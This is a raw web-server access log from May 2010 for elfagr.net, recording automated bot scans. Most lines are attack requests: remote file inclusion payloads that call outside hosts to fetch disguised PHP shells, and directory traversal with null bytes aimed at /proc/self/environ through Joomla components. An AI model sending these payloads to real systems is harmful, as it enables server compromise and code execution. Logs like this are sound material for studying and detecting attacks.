187.45.193.159 - - [06/May/2010:15:34:57 -0700] "GET /pcltar.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
187.45.193.159 - - [06/May/2010:15:35:07 -0700] "GET /logs//pcltar.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
187.45.193.159 - - [06/May/2010:15:36:21 -0700] "GET /logs/access_091126.log//pcltar.php?g_pcltar_lib_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
93.158.149.32 - - [06/May/2010:15:41:44 -0700] "GET /logs/access_091029.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
91.103.220.36 - - [06/May/2010:15:43:59 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
95.110.193.26 - - [06/May/2010:15:44:38 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
72.29.80.127 - - [06/May/2010:15:45:39 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.172.150.13 - - [06/May/2010:15:45:59 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "elfagr.net"
75.25.154.162 - - [06/May/2010:15:46:28 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
62.140.247.10 - - [06/May/2010:15:46:23 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:15:46:23 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:15:46:23 -0700] "GET /logs/access.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
195.225.170.200 - - [06/May/2010:15:46:30 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
81.31.157.143 - - [06/May/2010:15:46:35 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
62.112.222.113 - - [06/May/2010:15:48:45 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
62.140.247.10 - - [06/May/2010:15:49:07 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:15:49:07 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:15:49:07 -0700] "GET /logs/access.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
65.49.28.194 - - [06/May/2010:15:49:41 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
62.140.247.10 - - [06/May/2010:15:53:51 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:15:53:43 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:15:53:53 -0700] "GET /logs/access.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.38.187.136 - - [06/May/2010:15:54:23 -0700] "GET /common/db.php?commonpath=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.38.187.136 - - [06/May/2010:15:54:23 -0700] "GET /logs//common/db.php?commonpath=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.38.187.136 - - [06/May/2010:15:54:15 -0700] "GET /logs/access.log%20%20//common/db.php?commonpath=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.38.187.136 - - [06/May/2010:15:55:20 -0700] "GET /logs//common/db.php?commonpath=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.38.187.136 - - [06/May/2010:15:55:20 -0700] "GET /common/db.php?commonpath=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.38.187.136 - - [06/May/2010:15:55:20 -0700] "GET /logs/access.log%20%20//common/db.php?commonpath=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
91.103.220.36 - - [06/May/2010:15:56:25 -0700] "GET /logs/access.log//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
91.103.220.36 - - [06/May/2010:15:56:25 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
91.103.220.36 - - [06/May/2010:15:56:34 -0700] "GET /logs//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
95.110.193.26 - - [06/May/2010:15:56:47 -0700] "GET /logs/access.log//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
95.110.193.26 - - [06/May/2010:15:56:47 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
95.110.193.26 - - [06/May/2010:15:56:47 -0700] "GET /logs//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.172.150.13 - - [06/May/2010:15:57:39 -0700] "GET /logs/access.log//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "elfagr.net"
217.172.150.13 - - [06/May/2010:15:57:39 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "elfagr.net"
217.172.150.13 - - [06/May/2010:15:57:48 -0700] "GET /logs//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "elfagr.net"
72.29.80.127 - - [06/May/2010:15:58:05 -0700] "GET /logs/access.log//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
72.29.80.127 - - [06/May/2010:15:58:14 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
72.29.80.127 - - [06/May/2010:15:58:05 -0700] "GET /logs//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
75.25.154.162 - - [06/May/2010:15:58:58 -0700] "GET /logs/access.log//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
75.25.154.162 - - [06/May/2010:15:58:59 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
75.25.154.162 - - [06/May/2010:15:59:08 -0700] "GET /logs//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
195.225.170.200 - - [06/May/2010:15:59:20 -0700] "GET /logs/access.log//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
195.225.170.200 - - [06/May/2010:15:59:21 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
195.225.170.200 - - [06/May/2010:15:59:30 -0700] "GET /logs//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
208.38.187.136 - - [06/May/2010:15:59:29 -0700] "GET /logs/access.log//common/db.php?commonpath=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
208.38.187.136 - - [06/May/2010:15:59:38 -0700] "GET /logs/access.log//common/db.php?commonpath=http://come.kr/bbs/data/banner/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
61.64.157.64 - - [06/May/2010:15:59:55 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
220.130.208.19 - - [06/May/2010:16:02:26 -0700] "GET ///?_PHPLIB[libdir]=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 200 1466 "-" "libwww-perl/5.65" "elfagr.net"
220.130.208.19 - - [06/May/2010:16:02:35 -0700] "GET /logs////?_PHPLIB[libdir]=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 200 5092 "-" "libwww-perl/5.65" "elfagr.net"
220.130.208.19 - - [06/May/2010:16:03:02 -0700] "GET ///?_PHPLIB[libdir]=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 200 1466 "-" "libwww-perl/5.65" "elfagr.net"
220.130.208.19 - - [06/May/2010:16:03:02 -0700] "GET /logs////?_PHPLIB[libdir]=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 200 5092 "-" "libwww-perl/5.65" "elfagr.net"
194.108.112.112 - - [06/May/2010:16:03:23 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:03:25 -0700] "GET /skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:03:25 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:03:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:03:31 -0700] "GET /skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:03:40 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:03:40 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:04:22 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:04:22 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:04:22 -0700] "GET /skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
81.31.157.143 - - [06/May/2010:16:05:48 -0700] "GET /logs/access.log//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
81.31.157.143 - - [06/May/2010:16:05:57 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
81.31.157.143 - - [06/May/2010:16:05:49 -0700] "GET /logs//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
62.112.222.113 - - [06/May/2010:16:06:24 -0700] "GET /logs/access.log//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
62.112.222.113 - - [06/May/2010:16:06:26 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
62.112.222.113 - - [06/May/2010:16:06:35 -0700] "GET /logs//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
220.130.208.19 - - [06/May/2010:16:08:56 -0700] "GET /logs/access_091008.log///?_PHPLIB[libdir]=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
220.130.208.19 - - [06/May/2010:16:08:48 -0700] "GET ///?_PHPLIB[libdir]=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 200 1466 "-" "libwww-perl/5.65" "www.elfagr.net"
220.130.208.19 - - [06/May/2010:16:08:48 -0700] "GET /logs////?_PHPLIB[libdir]=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 200 5092 "-" "libwww-perl/5.65" "www.elfagr.net"
65.49.28.194 - - [06/May/2010:16:09:25 -0700] "GET /logs/access.log//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
65.49.28.194 - - [06/May/2010:16:09:17 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
65.49.28.194 - - [06/May/2010:16:09:26 -0700] "GET /logs//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:11:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:11:08 -0700] "GET /skin/zero_vote/error.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:11:08 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
210.50.189.221 - - [06/May/2010:16:14:31 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
61.64.157.64 - - [06/May/2010:16:19:58 -0700] "GET /logs/access.log//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
61.64.157.64 - - [06/May/2010:16:19:59 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
61.64.157.64 - - [06/May/2010:16:20:00 -0700] "GET /logs//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:20:46 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:20:47 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:26:50 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:16:28:08 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
210.50.189.221 - - [06/May/2010:16:30:25 -0700] "GET /logs/access.log//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
210.50.189.221 - - [06/May/2010:16:30:26 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
210.50.189.221 - - [06/May/2010:16:30:27 -0700] "GET /logs//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:31:30 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:31:54 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:32:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
194.108.112.112 - - [06/May/2010:16:32:14 -0700] "GET /logs/access.log//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
194.108.112.112 - - [06/May/2010:16:32:23 -0700] "GET /index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
194.108.112.112 - - [06/May/2010:16:32:15 -0700] "GET /logs//index.php?body=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:33:33 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:33:25 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:33:26 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:33:30 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:33:40 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:33:32 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:34:26 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:34:27 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:34:36 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:34:34 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
93.158.149.32 - - [06/May/2010:16:38:47 -0700] "GET /logs/access_100107.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
174.136.55.175 - - [06/May/2010:16:41:41 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
174.136.55.175 - - [06/May/2010:16:41:41 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
174.136.55.175 - - [06/May/2010:16:41:50 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:42:45 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:42:37 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:16:42:38 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:16:34 -0700] "GET /index.php?option=com_performs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:16:42 -0700] "GET /index.php?option=com_performs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:17:49 -0700] "GET /index.php?option=com_linkdirectory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:18:18 -0700] "GET /index.php?option=com_linkdirectory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
205.234.252.102 - - [06/May/2010:17:19:36 -0700] "GET /index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
205.234.252.102 - - [06/May/2010:17:25:28 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
205.234.252.102 - - [06/May/2010:17:25:28 -0700] "GET /index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
205.234.252.102 - - [06/May/2010:17:25:37 -0700] "GET /logs/index.php?option=com_gcalendar&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
93.158.149.32 - - [06/May/2010:17:39:10 -0700] "GET /logs/access_100128.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
217.73.239.8 - - [06/May/2010:17:39:47 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
217.73.239.8 - - [06/May/2010:17:40:50 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
217.73.239.8 - - [06/May/2010:17:40:42 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
217.73.239.8 - - [06/May/2010:17:40:43 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:41:03 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:42:05 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:48:29 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:49:48 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:54:12 -0700] "GET /logs/access.log/index.php?option=com_linkdirectory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:54:04 -0700] "GET /index.php?option=com_linkdirectory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:54:04 -0700] "GET /logs/index.php?option=com_linkdirectory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:54:54 -0700] "GET /logs/access.log/index.php?option=com_linkdirectory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:55:03 -0700] "GET /index.php?option=com_linkdirectory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:54:55 -0700] "GET /logs/index.php?option=com_linkdirectory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
